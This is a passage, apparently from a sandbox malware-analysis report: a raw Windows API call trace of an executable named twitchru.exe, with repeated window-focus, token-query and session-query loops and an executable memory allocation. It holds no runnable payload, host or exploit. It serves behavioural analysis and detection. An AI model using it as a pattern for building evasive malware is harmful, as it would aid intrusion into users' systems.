nChar=0) returned 0 [0220.168] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x209c934 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0220.168] GetDC (hWnd=0x0) returned 0xa0100d0 [0220.168] GetTextMetricsW (in: hdc=0xa0100d0, lptm=0x209d250 | out: lptm=0x209d250) returned 1 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.168] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0220.170] CreateToolbarEx (hwnd=0x0, ws=0xffff0080, wID=0x0, nBitmaps=633510, hBMInst=0x0, wBMID=0x1, lpButtons=0x209f72c, iNumButtons=1, dxButton=0, dyButton=633510, dxBitmap=0, dyBitmap=633510, uStructSize=0x14) returned 0x3008a [0220.487] BeginPaint (in: hWnd=0x0, lpPaint=0x209cb3c | out: lpPaint=0x209cb3c) returned 0x0 [0220.487] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x209cbf4, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0220.487] PathRemoveFileSpecW (in: pszPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0220.487] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x209c61c, fWinIni=0x0 | out: pvParam=0x209c61c) returned 0 [0220.488] SelectObject (hdc=0xa0100d0, h=0x0) returned 0x0 [0220.488] DeleteObject (ho=0x0) returned 0 [0220.488] GetStockObject (i=0) returned 0x1900010 [0220.488] FillRgn (hdc=0xa0100d0, hrgn=0x77e, hbr=0x1900010) returned 0 [0220.488] GetLastError () returned 0x0 [0220.488] SetLastError (dwErrCode=0x0) [0220.488] LoadImageA (hInst=0x400000, name=0x80, type=0x0, cx=0, cy=0, fuLoad=0x0) returned 0x0 [0220.488] VirtualAlloc (lpAddress=0x0, dwSize=0xc000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f50000 [0220.488] EndPaint (hWnd=0x0, lpPaint=0x209cb3c) returned 0 [0220.489] CreateCompatibleDC (hdc=0x0) returned 0x40106c5 [0220.489] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.499] SelectObject (hdc=0x40106c5, h=0x0) returned 0x0 [0220.499] CreateCompatibleDC (hdc=0x0) returned 0x40106c4 [0220.499] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.503] SelectObject (hdc=0x40106c4, h=0x0) returned 0x0 [0220.503] CreateCompatibleDC (hdc=0x0) returned 0x40106cb [0220.503] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.508] SelectObject (hdc=0x40106cb, h=0x0) returned 0x0 [0220.508] CreateCompatibleDC (hdc=0x0) returned 0x19010694 [0220.508] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.511] SelectObject (hdc=0x19010694, h=0x0) returned 0x0 [0220.511] CreateCompatibleDC (hdc=0x0) returned 0x80106cc [0220.511] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.513] SelectObject (hdc=0x80106cc, h=0x0) returned 0x0 [0220.513] CreateCompatibleDC (hdc=0x0) returned 0xe0106cd [0220.514] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.516] SelectObject (hdc=0xe0106cd, h=0x0) returned 0x0 [0220.516] CreateCompatibleDC (hdc=0x0) returned 0x80106ce [0220.516] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.519] SelectObject (hdc=0x80106ce, h=0x0) returned 0x0 [0220.519] CreateCompatibleDC (hdc=0x0) returned 0x10106cf [0220.519] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.525] SelectObject (hdc=0x10106cf, h=0x0) returned 0x0 [0220.526] CreateCompatibleDC (hdc=0x0) returned 0x20106d1 [0220.526] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.528] SelectObject (hdc=0x20106d1, h=0x0) returned 0x0 [0220.528] CreateCompatibleDC (hdc=0x0) returned 0x20106d2 [0220.528] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.531] SelectObject (hdc=0x20106d2, h=0x0) returned 0x0 [0220.531] CreateCompatibleDC (hdc=0x0) returned 0x20106d0 [0220.531] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.534] SelectObject (hdc=0x20106d0, h=0x0) returned 0x0 [0220.577] CreateCompatibleDC (hdc=0x0) returned 0x1b0106d7 [0220.577] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.580] SelectObject (hdc=0x1b0106d7, h=0x0) returned 0x0 [0220.580] CreateCompatibleDC (hdc=0x0) returned 0xf0106d8 [0220.587] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.590] SelectObject (hdc=0xf0106d8, h=0x0) returned 0x0 [0220.590] CreateCompatibleDC (hdc=0x0) returned 0x20106da [0220.590] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.592] SelectObject (hdc=0x20106da, h=0x0) returned 0x0 [0220.592] CreateCompatibleDC (hdc=0x0) returned 0x20106db [0220.593] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.595] SelectObject (hdc=0x20106db, h=0x0) returned 0x0 [0220.595] CreateCompatibleDC (hdc=0x0) returned 0x20106d9 [0220.595] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.598] SelectObject (hdc=0x20106d9, h=0x0) returned 0x0 [0220.598] CreateCompatibleDC (hdc=0x0) returned 0x80106dc [0220.598] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.603] SelectObject (hdc=0x80106dc, h=0x0) returned 0x0 [0220.603] CreateCompatibleDC (hdc=0x0) returned 0xe0106dd [0220.603] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.606] SelectObject (hdc=0xe0106dd, h=0x0) returned 0x0 [0220.606] CreateCompatibleDC (hdc=0x0) returned 0x80106de [0220.606] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.609] SelectObject (hdc=0x80106de, h=0x0) returned 0x0 [0220.609] CreateCompatibleDC (hdc=0x0) returned 0x10106df [0220.609] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.612] SelectObject (hdc=0x10106df, h=0x0) returned 0x0 [0220.612] CreateCompatibleDC (hdc=0x0) returned 0x10106e0 [0220.612] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.620] SelectObject (hdc=0x10106e0, h=0x0) returned 0x0 [0220.620] CreateCompatibleDC (hdc=0x0) returned 0x20106e2 [0220.620] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.623] SelectObject (hdc=0x20106e2, h=0x0) returned 0x0 [0220.623] CreateCompatibleDC (hdc=0x0) returned 0x20106e3 [0220.623] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.626] SelectObject (hdc=0x20106e3, h=0x0) returned 0x0 [0220.626] CreateCompatibleDC (hdc=0x0) returned 0x20106e1 [0220.626] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.628] SelectObject (hdc=0x20106e1, h=0x0) returned 0x0 [0220.628] CreateCompatibleDC (hdc=0x0) returned 0x80106e4 [0220.628] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.635] SelectObject (hdc=0x80106e4, h=0x0) returned 0x0 [0220.635] CreateCompatibleDC (hdc=0x0) returned 0x90106e6 [0220.635] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.637] SelectObject (hdc=0x90106e6, h=0x0) returned 0x0 [0220.637] CreateCompatibleDC (hdc=0x0) returned 0x20106e7 [0220.637] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.640] SelectObject (hdc=0x20106e7, h=0x0) returned 0x0 [0220.640] CreateCompatibleDC (hdc=0x0) returned 0xf0106e5 [0220.640] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.643] SelectObject (hdc=0xf0106e5, h=0x0) returned 0x0 [0220.643] CreateCompatibleDC (hdc=0x0) returned 0x80106e8 [0220.643] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0220.645] SelectObject (hdc=0x80106e8, h=0x0) returned 0x0 [0220.645] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0220.645] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0220.648] GetStockObject (i=0) returned 0x1900010 [0220.648] RegisterClassA (lpWndClass=0x209bf8c) returned 0xc148 [0220.649] CreateWindowExA (dwExStyle=0x0, lpClassName="EndJoin", lpWindowName="End", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x0 [0220.666] ShowWindow (hWnd=0x0, nCmdShow=1) returned 0 [0220.666] UpdateWindow (hWnd=0x0) returned 0 [0220.666] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x1, lParam=0x1) returned 0x0 [0220.666] CreateFileA (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0220.666] ReadFile (in: hFile=0xffffffff, lpBuffer=0x209b8cc, nNumberOfBytesToRead=0xe, lpNumberOfBytesRead=0x209b8dc, lpOverlapped=0x0 | out: lpBuffer=0x209b8cc, lpNumberOfBytesRead=0x209b8dc*=0x0, lpOverlapped=0x0) returned 0 [0220.666] CloseHandle (hObject=0xffffffff) returned 1 [0220.668] GetDesktopWindow () returned 0x10010 [0220.668] GetWindowRgn (hWnd=0x10010, hRgn=0x9db9af68) returned 0 [0220.668] GetDesktopWindow () returned 0x10010 [0220.668] GetDCEx (hWnd=0x10010, hrgnClip=0x9db9af68, flags=0x1) returned 0x0 [0220.668] GetCursorPos (in: lpPoint=0x209a660 | out: lpPoint=0x209a660*(x=864, y=359)) returned 1 [0220.668] wsprintfA (in: param_1=0x209a6c4, param_2="%d %d %d" | out: param_1="255 255 255") returned 11 [0220.668] CreateStdAccessibleObject () returned 0x80004005 [0220.672] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.672] TextOutW (hdc=0x0, x=94, y=-1, lpString="", c=0) returned 1 [0220.672] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.672] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.672] GetTickCount () returned 0xe1a5 [0220.689] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.706] SetForegroundWindow (hWnd=0x0) returned 0 [0220.706] BringWindowToTop (hWnd=0x0) returned 0 [0220.706] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x22c) returned 1 [0220.706] GetTokenInformation (in: TokenHandle=0x22c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.706] GetLastError () returned 0x7a [0220.706] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.706] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.748] WTSFreeMemory (pMemory=0x0) [0220.748] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.748] TextOutW (hdc=0x0, x=104, y=24, lpString="", c=0) returned 1 [0220.748] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.748] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.748] GetTickCount () returned 0xe1f3 [0220.749] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.749] SetForegroundWindow (hWnd=0x0) returned 0 [0220.749] BringWindowToTop (hWnd=0x0) returned 0 [0220.749] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x254) returned 1 [0220.749] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.749] GetLastError () returned 0x7a [0220.749] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.749] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.750] WTSFreeMemory (pMemory=0x0) [0220.750] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.750] TextOutW (hdc=0x0, x=114, y=49, lpString="", c=0) returned 1 [0220.750] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.750] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.750] GetTickCount () returned 0xe1f3 [0220.750] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.750] SetForegroundWindow (hWnd=0x0) returned 0 [0220.750] BringWindowToTop (hWnd=0x0) returned 0 [0220.751] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x258) returned 1 [0220.751] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.751] GetLastError () returned 0x7a [0220.751] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.751] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.751] WTSFreeMemory (pMemory=0x0) [0220.751] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.751] TextOutW (hdc=0x0, x=124, y=74, lpString="", c=0) returned 1 [0220.751] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.751] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.751] GetTickCount () returned 0xe1f3 [0220.752] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.752] SetForegroundWindow (hWnd=0x0) returned 0 [0220.752] BringWindowToTop (hWnd=0x0) returned 0 [0220.752] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x25c) returned 1 [0220.752] GetTokenInformation (in: TokenHandle=0x25c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.752] GetLastError () returned 0x7a [0220.752] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.752] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.753] WTSFreeMemory (pMemory=0x0) [0220.753] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.753] TextOutW (hdc=0x0, x=134, y=99, lpString="", c=0) returned 1 [0220.753] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.753] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.753] GetTickCount () returned 0xe1f3 [0220.753] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.753] SetForegroundWindow (hWnd=0x0) returned 0 [0220.753] BringWindowToTop (hWnd=0x0) returned 0 [0220.754] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x260) returned 1 [0220.754] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.754] GetLastError () returned 0x7a [0220.754] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.754] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.754] WTSFreeMemory (pMemory=0x0) [0220.754] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.754] TextOutW (hdc=0x0, x=144, y=124, lpString="", c=0) returned 1 [0220.754] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.754] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.754] GetTickCount () returned 0xe1f3 [0220.759] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.759] SetForegroundWindow (hWnd=0x0) returned 0 [0220.759] BringWindowToTop (hWnd=0x0) returned 0 [0220.759] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x264) returned 1 [0220.759] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.759] GetLastError () returned 0x7a [0220.759] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.759] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.760] WTSFreeMemory (pMemory=0x0) [0220.760] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.760] TextOutW (hdc=0x0, x=154, y=149, lpString="", c=0) returned 1 [0220.760] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.760] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.760] GetTickCount () returned 0xe203 [0220.760] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.760] SetForegroundWindow (hWnd=0x0) returned 0 [0220.760] BringWindowToTop (hWnd=0x0) returned 0 [0220.760] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x268) returned 1 [0220.761] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.761] GetLastError () returned 0x7a [0220.761] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.761] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.761] WTSFreeMemory (pMemory=0x0) [0220.761] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.761] TextOutW (hdc=0x0, x=164, y=174, lpString="", c=0) returned 1 [0220.761] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.761] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.761] GetTickCount () returned 0xe203 [0220.762] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.762] SetForegroundWindow (hWnd=0x0) returned 0 [0220.762] BringWindowToTop (hWnd=0x0) returned 0 [0220.762] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x26c) returned 1 [0220.763] GetTokenInformation (in: TokenHandle=0x26c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.763] GetLastError () returned 0x7a [0220.763] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.763] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.763] WTSFreeMemory (pMemory=0x0) [0220.763] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.763] TextOutW (hdc=0x0, x=174, y=199, lpString="", c=0) returned 1 [0220.763] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.763] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.763] GetTickCount () returned 0xe203 [0220.764] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.764] SetForegroundWindow (hWnd=0x0) returned 0 [0220.764] BringWindowToTop (hWnd=0x0) returned 0 [0220.764] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x270) returned 1 [0220.764] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.764] GetLastError () returned 0x7a [0220.764] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.764] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.765] WTSFreeMemory (pMemory=0x0) [0220.765] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.765] TextOutW (hdc=0x0, x=184, y=224, lpString="", c=0) returned 1 [0220.765] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.765] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.765] GetTickCount () returned 0xe203 [0220.766] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.766] SetForegroundWindow (hWnd=0x0) returned 0 [0220.766] BringWindowToTop (hWnd=0x0) returned 0 [0220.766] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x274) returned 1 [0220.766] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.766] GetLastError () returned 0x7a [0220.766] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.766] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.767] WTSFreeMemory (pMemory=0x0) [0220.767] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.767] TextOutW (hdc=0x0, x=194, y=249, lpString="", c=0) returned 1 [0220.767] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.767] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.767] GetTickCount () returned 0xe203 [0220.767] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.767] SetForegroundWindow (hWnd=0x0) returned 0 [0220.767] BringWindowToTop (hWnd=0x0) returned 0 [0220.768] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x278) returned 1 [0220.768] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.768] GetLastError () returned 0x7a [0220.768] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.768] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.768] WTSFreeMemory (pMemory=0x0) [0220.768] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.768] TextOutW (hdc=0x0, x=204, y=274, lpString="", c=0) returned 1 [0220.768] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.768] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.768] GetTickCount () returned 0xe203 [0220.769] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.769] SetForegroundWindow (hWnd=0x0) returned 0 [0220.769] BringWindowToTop (hWnd=0x0) returned 0 [0220.769] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x27c) returned 1 [0220.769] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x1, 